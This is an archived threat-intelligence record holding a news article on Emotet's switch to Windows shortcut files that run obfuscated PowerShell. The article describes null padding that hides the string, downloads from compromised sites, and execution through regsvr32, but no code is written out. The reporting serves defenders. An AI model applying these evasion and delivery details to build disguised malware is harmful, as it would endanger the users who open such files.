{
	"id": "154e790b-5fe4-41ef-834f-6e589acd8a37",
	"created_at": "2026-04-06T00:19:56.844093Z",
	"updated_at": "2026-04-10T03:21:16.884595Z",
	"deleted_at": null,
	"sha1_hash": "e6dde12567e95688fab1e98a48a48248703b8f70",
	"title": "Emotet malware now installs via PowerShell in Windows shortcut files",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1883611,
	"plain_text": "Emotet malware now installs via PowerShell in Windows shortcut files\r\nBy Ionut Ilascu\r\nPublished: 2022-04-26 · Archived: 2026-04-05 15:49:45 UTC\r\nThe Emotet botnet is now using Windows shortcut files (.LNK) containing PowerShell commands to infect victims\r\ncomputers, moving away from Microsoft Office macros that are now disabled by default.\r\nThe use of .LNK files is not new, as the Emotet gang previously used them in a combination with Visual Basic Script (VBS)\r\ncode to build a command that downloads the payload. However, this is the first time that they utilized Windows shortcuts to\r\ndirectly execute PowerShell commands.\r\nNew technique after botched campaign\r\nLast Friday, Emotet operators pulled the plug on a phishing campaign because they botched their installer after using a static\r\nfile name to reference the malicious .LNK shortcut.\r\nhttps://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/\r\nPage 1 of 4\n\n0:00\r\nhttps://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/\r\nPage 2 of 4\n\nVisit Advertiser websiteGO TO PAGE\r\nLaunching the shortcut would trigger a command that extracted a string of VBS code and added it to a VBS file to execute.\r\nHowever, as the distributed shortcut files had a different name than the static one they were looking for, it would fail to\r\ncreate the VBS file correctly. The gang fixed the problem yesterday.\r\nToday, security researchers noticed that Emotet switched to a new technique that uses PowerShell commands attached to the\r\nLNK file to download and execute a script on the infected computer.\r\nThe malicious string appended to the .LNK file is obfuscated and padded with nulls (blank space) so that it does not show in\r\nthe target field (the file the shortcut points to) of the file’s properties dialog box.\r\nsource: BleepingComputer\r\nEmotet’s malicious .LNK file includes URLs for several compromised websites used for storing the PowerShell script\r\npayload. If the script is present at one of the defined locations, it is downloaded to the system’s temporary folder as a\r\nPowerShell script with a random name.\r\nBelow is the deobfuscated version of the malicious string Emotet attached to the .LNK payload:\r\nsource: BleepingComputer\r\nThis script generates and launches another PowerShell script that downloads the Emotet malware from a list of\r\ncompromised sites and save it to the %Temp% folder. The downloaded DLL is then executed using the regsvr32.exe\r\ncommand.\r\nExecuting the PowerShell script is done using the Regsvr32.exe command-line utility and ends with downloading and\r\nlaunching Emotet malware.\r\nhttps://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/\r\nPage 3 of 4\n\nSecurity researcher Max Malyutin says that along with using PowerShell in LNK files, this execution flow is new to Emotet\r\nmalware deployment.\r\nNew technique on the rise\r\nThe Cryptolaemus researcher group, which is closely monitoring Emotet activity, notes that the new technique is a clear\r\nattempt from the threat actor to bypass defenses and automated detection.\r\nSecurity researchers at cybersecurity company ESET also noticed that the use of the new Emotet technique has increased in\r\nthe past 24 hours.\r\nESET’s telemetry data shows that the countries most affected by Emotet via the new technique are Mexico, Italy, Japan,\r\nTurkey, and Canada.\r\nApart from switching to PowerShell in .LNK files, the Emotet botnet operators have made a few other changes since they\r\nresumed activity to steadier levels in November, such as moving to 64-bit modules.\r\nThe malware is typically used as a gateway for other malware, particularly ransomware threats like Conti.\r\nAutomated Pentesting Covers Only 1 of 6 Surfaces.\r\nAutomated pentesting proves the path exists. BAS proves whether your controls stop it. Most teams run one without the\r\nother.\r\nThis whitepaper maps six validation surfaces, shows where coverage ends, and provides practitioners with three diagnostic\r\nquestions for any tool evaluation.\r\nSource: https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/\r\nhttps://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/"
	],
	"report_names": [
		"emotet-malware-now-installs-via-powershell-in-windows-shortcut-files"
	],
	"threat_actors": [],
	"ts_created_at": 1775434796,
	"ts_updated_at": 1775791276,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e6dde12567e95688fab1e98a48a48248703b8f70.pdf",
		"text": "https://archive.orkl.eu/e6dde12567e95688fab1e98a48a48248703b8f70.txt",
		"img": "https://archive.orkl.eu/e6dde12567e95688fab1e98a48a48248703b8f70.jpg"
	}
}